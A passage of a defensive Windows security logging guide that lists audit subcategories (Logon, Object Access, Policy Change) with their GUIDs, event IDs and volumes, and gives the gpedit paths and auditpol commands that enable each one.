More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-logoff)\n\n#### Logon\n\n- Subcategory GUID: `{0CCE9215-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume:\n  - `Low on a client computer.`\n  - `Medium on a domain controllers or network servers.`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4624\n  - 4625\n  - 4648\n  - 4675\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Logon/Logoff\n                        - Audit Logon\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9215-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9215-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-logon)\n\n#### Network Policy Server\n\n- Subcategory GUID: `{0CCE9243-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Medium to High on servers that are running Network Policy Server (NPS).`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 6272\n  - 6273\n  - 6274\n  - 6275\n  - 6276\n  - 6277\n  - 6278\n  - 6279\n  - 6280\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Logon/Logoff\n                        - Audit Network Policy Server\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9243-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9243-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-network-policy-server)\n\n#### Other Logon/Logoff Events\n\n- Subcategory GUID: `{0CCE921C-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4649\n  - 4778\n  - 4779\n  - 4800\n  - 4801\n  - 4802\n  - 4803\n  - 5378\n  - 5632\n  - 5633\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Logon/Logoff\n                        - Audit Other Logon/Logoff Events\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE921C-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE921C-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-logonlogoff-events)\n\n#### Special Logon\n\n- Subcategory GUID: `{0CCE921B-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume:\n  - `Low on a client computer.`\n  - `Medium on a domain controllers or network servers.`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4964\n  - 4672\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Logon/Logoff\n                        - Audit Special Logon\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE921B-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE921B-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-special-logon)\n\n### Object Access\n\n#### Application Generated\n\n- Subcategory GUID: `{0CCE9222-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: TBD\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4665\n  - 4666\n  - 4667\n  - 4668\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Audit Application Generated\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9222-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9222-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-application-generated)\n\n#### Certification Services\n\n- Subcategory GUID: `{0CCE9221-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low to medium on servers that provide AD CS role services`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4868\n  - 4869\n  - 4870\n  - 4871\n  - 4872\n  - 4873\n  - 4874\n  - 4875\n  - 4876\n  - 4877\n  - 4878\n  - 4879\n  - 4880\n  - 4881\n  - 4882\n  - 4883\n  - 4884\n  - 4885\n  - 4886\n  - 4887\n  - 4888\n  - 4889\n  - 4890\n  - 4891\n  - 4892\n  - 4893\n  - 4894\n  - 4895\n  - 4896\n  - 4897\n  - 4898\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Audit Certification Services\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9221-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9221-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-certification-services)\n\n#### Detailed File Share\n\n- Subcategory GUID: `{0CCE9244-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume:\n  - `High on file servers.`\n  - `High on domain controllers because of SYSVOL network access required by Group Policy.`\n  - `Low on member servers and workstations.`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 5145\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Audit Detailed File Share\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9244-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9244-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-detailed-file-share)\n\n#### File Share\n\n- Subcategory GUID: `{0CCE9224-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume:\n  - `High on file servers.`\n  - `High on domain controllers because of SYSVOL network access required by Group Policy.`\n  - `Low on member servers and workstations.`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 5140\n  - 5142\n  - 5143\n  - 5144\n  - 5168\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Audit File Share\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9224-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9224-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-file-share)\n\n#### File System\n\n- Subcategory GUID: `{0CCE921D-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Varies, depending on how file system SACLs are configured`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4656\n  - 4658\n  - 4660\n  - 4663\n  - 4664\n  - 4670\n  - 4985\n  - 5051\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Audit File System\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE921D-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE921D-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-file-system)\n\n#### Filtering Platform Connection\n\n- Subcategory GUID: `{0CCE9226-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 5031\n  - 5150\n  - 5151\n  - 5154\n  - 5155\n  - 5156\n  - 5157\n  - 5158\n  - 5159\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Audit Filtering Platform Connection\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9226-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9226-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-filtering-platform-connection)\n\n#### Filtering Platform Packet Drop\n\n- Subcategory GUID: `{0CCE9225-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 5152\n  - 5153\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Audit Filtering Platform Packet Drop\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9225-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9225-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-filtering-platform-packet-drop)\n\n#### Handle Manipulation\n\n- Subcategory GUID: `{0CCE9223-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4658\n  - 4690\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Audit Handle Manipulation\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9223-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9223-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-handle-manipulation)\n\n#### Kernel Object\n\n- Subcategory GUID: `{0CCE921F-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4656\n  - 4658\n  - 4660\n  - 4663\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Audit Kernel Object\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE921F-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE921F-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-kernel-object)\n\n#### Other Object Access Events\n\n- Subcategory GUID: `{0CCE9227-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Medium to High`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4671\n  - 4691\n  - 4698\n  - 4699\n  - 4700\n  - 4701\n  - 4702\n  - 5148\n  - 5149\n  - 5888\n  - 5889\n  - 5890\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Audit Other Object Access Events\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9227-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9227-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events)\n\n#### Registry\n\n- Subcategory GUID: `{0CCE921E-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low to Medium, depending on how registry SACLs are configured.`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4656\n  - 4657\n  - 4658\n  - 4660\n  - 4663\n  - 4670\n  - 5039\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Audit Registry\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE921E-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE921E-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-registry)\n\n#### Removable Storage\n\n- Subcategory GUID: `{0CCE9245-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: TBD\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4656\n  - 4658\n  - 4663\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Audit Removable Storage\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9245-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9245-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-removable-storage)\n\n#### SAM\n\n- Subcategory GUID: `{0CCE9220-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High on domain controllers`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4661\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Audit SAM\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9220-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9220-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-sam)\n\n#### Central Access Policy Staging\n\n- Subcategory GUID: `{0CCE9246-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `High`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4818\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Object Access\n                        - Audit Central Access Policy Staging\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9246-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9246-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-central-access-policy-staging)\n\n### Policy Change\n\n#### Audit Policy Change\n\n- Subcategory GUID: `{0CCE922F-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4715\n  - 4719\n  - 4817\n  - 4902\n  - 4906\n  - 4907\n  - 4908\n  - 4912\n  - 4904\n  - 4905\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Policy Change\n                        - Audit Audit Policy Change\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE922F-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE922F-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-audit-policy-change)\n\n#### Authentication Policy Change\n\n- Subcategory GUID: `{0CCE9230-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Low`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4670\n  - 4706\n  - 4707\n  - 4716\n  - 4713\n  - 4717\n  - 4718\n  - 4739\n  - 4864\n  - 4865\n  - 4866\n  - 4867\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Policy Change\n                        - Audit Authentication Policy Change\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9230-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9230-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-authentication-policy-change)\n\n#### Authorization Policy Change\n\n- Subcategory GUID: `{0CCE9231-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Medium to High`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4703\n  - 4704\n  - 4705\n  - 4670\n  - 4911\n  - 4913\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Policy Change\n                        - Audit Authorization Policy Change\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9231-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9231-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-authorization-policy-change)\n\n#### Filtering Platform Policy Change\n\n- Subcategory GUID: `{0CCE9233-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: TBD\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4709\n  - 4710\n  - 4711\n  - 4712\n  - 5040\n  - 5041\n  - 5042\n  - 5043\n  - 5044\n  - 5045\n  - 5046\n  - 5047\n  - 5048\n  - 5440\n  - 5441\n  - 5442\n  - 5443\n  - 5444\n  - 5446\n  - 5448\n  - 5449\n  - 5450\n  - 5456\n  - 5457\n  - 5458\n  - 5459\n  - 5460\n  - 5461\n  - 5462\n  - 5463\n  - 5464\n  - 5465\n  - 5466\n  - 5467\n  - 5468\n  - 5471\n  - 5472\n  - 5473\n  - 5474\n  - 5477\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Policy Change\n                        - Audit Filtering Platform Policy Change\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9233-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9233-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-filtering-platform-policy-change)\n\n#### MPSSVC Rule-Level Policy Change\n\n- Subcategory GUID: `{0CCE9232-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Medium`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4944\n  - 4945\n  - 4946\n  - 4947\n  - 4948\n  - 4949\n  - 4950\n  - 4951\n  - 4952\n  - 4953\n  - 4954\n  - 4956\n  - 4957\n  - 4958\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Policy Change\n                        - Audit MPSSVC Rule-Level Policy Change\n                            - Success and Failure\n```\n\nAlternatively you can enable logging via `auditpol` using the following command(s):\n\n```powershell\n# Enable Success audit Only\nauditpol /set /subcategory:{0CCE9232-69AE-11D9-BED3-505054503030}, /success:enable\n\n# Enable both Success and Failure auditing\nauditpol /set /subcategory:{0CCE9232-69AE-11D9-BED3-505054503030}, /success:enable /failure:enable\n```\n\nIf you want to learn more about this sub-category. You can do so via MSDN - [Learn More](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-mpssvc-rule-level-policy-change)\n\n#### Other Policy Change Events\n\n- Subcategory GUID: `{0CCE9234-69AE-11D9-BED3-505054503030}`\n- Provider: `Microsoft Windows Security Auditing`\n- Channel: `Security`\n- Event Volume: `Medium to High`\n- API Mapping: [Learn More](https://github.com/jsecurity101/TelemetrySource/tree/main/Microsoft-Windows-Security-Auditing)\n- EventID(s):\n  - 4714\n  - 4819\n  - 4826\n  - 4909\n  - 4910\n  - 5063\n  - 5064\n  - 5065\n  - 5066\n  - 5067\n  - 5068\n  - 5069\n  - 5070\n  - 5447\n  - 6144\n  - 6145\n\nIf you're using `gpedit.msc` or similar you can enable logging for this category by following the structure below\n\n```yml\n- Computer Configuration\n    - Windows Settings\n        - Security Settings\n            - Advanced Audit Policy Configuration\n                - System Audit Policies - Local Group Policy Object\n                    - Policy Change\n                        - Audit 